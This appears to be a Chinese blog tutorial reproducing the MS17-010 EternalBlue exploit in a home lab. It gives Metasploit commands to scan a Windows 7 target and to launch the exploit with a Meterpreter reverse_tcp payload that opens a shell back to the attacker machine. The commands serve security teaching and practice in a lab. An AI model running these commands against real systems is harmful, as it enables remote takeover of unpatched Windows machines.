metasploit實戰-ms17-010(永恆之藍)漏洞利用與復現

在這裏插入圖片描述

永恆之藍概述

ms17-010(永恆之藍)漏洞是由Shadow Brokers(影子經紀人)在2017年4月公佈的大批漏洞之一,該漏洞利用Windows系統的SMB漏洞可以獲取系統最高權限。曾經席捲全球的Wanna cry勒索病毒就是不法分子基於該漏洞進行改造。

實驗環境

攻擊機:Kali Linux
攻擊機ip地址:192.168.0.133

被攻擊機:Windows 7 Home Basic 7601 Service Pack 1 x64
被攻擊機ip地址:192.168.0.135
環境搭建傳送門:Kali Linux安裝與使用指南

實驗過程

第一步:掃描漏洞

進入msf以後我們用search ms17-010查找該漏洞有關的模塊
在這裏插入圖片描述
掃描目標主機存不存在該漏洞我們用auxiliary/scanner/smb/smb_ms17_010這個模塊
使用方法

use auxiliary/scanner/smb/smb_ms17_010
set rhosts   192.168.0.135
set threads  100
run

在這裏插入圖片描述
我們可以看到該主機存在該漏洞
在這裏插入圖片描述

第二步:滲透攻擊

利用exploit/windows/smb/ms17_010_eternalblue模塊來攻擊該機器

use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.0.135
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.0.133
run

其中 rhost爲目標主機iplhost爲攻擊機器的ip
在這裏插入圖片描述
在這裏插入圖片描述
在這裏插入圖片描述
在這裏插入圖片描述
從結果來看,顯示攻擊成功並且拿到了shell權限了,這時候我們就可以爲所欲爲
在這裏插入圖片描述

第三步:漏洞利用

輸入help可以查看能夠利用的命令
在這裏插入圖片描述
在這裏插入圖片描述

截屏

在這裏插入圖片描述
在這裏插入圖片描述
其他操作我們根據meterpreter 相關的命令執行即可。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章